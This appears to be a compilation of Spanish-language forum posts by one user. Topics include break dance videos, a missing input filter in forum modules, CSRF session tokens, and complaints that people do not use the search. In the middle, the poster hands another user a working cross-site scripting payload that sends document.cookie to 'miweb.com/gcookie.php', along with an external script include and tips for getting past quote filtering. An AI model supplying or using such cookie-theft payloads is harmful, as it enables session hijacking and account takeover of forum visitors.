Acabo de actualizarlo, había un par de temas pendientes...

Gracias por los comentarios.

PD: Pox1, busca en redes P2P, eMule mismo. Es difícil dar con vídeos de break dance en descarga directa. Si te gusta el break dance, te recomiendo esta película; You Got Served, suerte!

Sería un tema a debatir, el de si los programadores, conscientemente, no establecieron un sistema de filtración en la variable de los nombres de los subforos y de los grupos...

Que no exista tal protección en un sistema de noticias puede ser pasable, ¿pero qué utilidad puede tener alterar el contenido a visualizar de dos variables cuya única función es mostrar un dato constante e informativo? Estoy hablando de los módulos manageboards y membergroups...

A pesar de los daños que podrían ocasionar estos ataques, existen las sesiones de identificación, las cuales nos protegen contra posibles actos no deseados, en nuestro foro, al visitar cierto tipo de páginas Web con código malicioso.

Hablo de la ejecución de ciertas operaciones mediante formularios que se auto envían al visitar una página Web, previamente manipulada para ello, claro ésta. Si desconocemos el identificador de sesión, que es un combinación alfanumérica generada pseudo-aleatoriamente en cada sesión, no podremos ejecutar esa serie de operaciones.

Conclusión... no hay peligro inminente.

Clasifiquemoslo como un fallo de diseño, pues al parecer no puede ser explotado maliciosamente...

Reporta el fallo mediante el siguiente formulario: http://account.fotolog.com/help

Quizás esto te pueda ayudar...

<script>
 
var url = "http://miweb.com/gcookie.php?c=";
 
function str2asc (str) {
	var temp = '';
	for (i=0;i<str.length;i++) {
		temp += str.charCodeAt(i);
		if (i!=str.length-1) { temp += ','; }
	}
 
	return temp;
}
 
document.write("window.location=String.fromCharCode("+str2asc(url)+")+escape(document.cookie);");
 
</script>

Debes transformar la cadena que se encuentra entre comillas simples a ASCII para usarla con el método que te mencioné...


Donde X ha de ir la página Web junto a la variable que recogerá la cookie, escrita carácter a carácter en ASCII, separado cada uno por una coma.

PD: La función escape se utiliza para escapar los saltos de línea, así evitaremos posibles perdidas por parte de la cookie.

Examina el código fuente de la página Web una vez inyectado el código para verificar que éste sea correcto. Aunque en tu caso supongo que será por que las comillas simples se encuentran filtradas, y bien desaparecen cuando se inyectan, o una contra barra pasa a formar parte de la comillas simples para que ésta escape \'.

Prueba a utilizar comillas dobles a ver si sucede lo mismo, y si no, haz una inclusión del código JS a ejecutar:

<script src=http://miweb.com/script.js></script>

También puedes utilizar el método del objeto String, fromCharCode... He aquí un ejemplo:

<script>alert(String.fromCharCode(65,66,67))</script>

Si yo le doy de comer a un perro callejero y éste satisface sus necesidades, probablemente al día siguiente lo volveré a ver, pidiéndome lo qué en un principio le dí de mi propia mano.

No, no te estoy comparando con un perro, solo digo, que veo más productivo concienciar al usuario de que existe un buscador, y que en el tiempo en el que tarda uno en escribir un tema, es posible encontrar posibles respuesta a esas preguntas.

¿Sé usar Google? Yo creo que hasta un mono podría usarlo si tuviera la inteligencia más desarrollada. ¿Es un mono más listo que tú? mmm, no...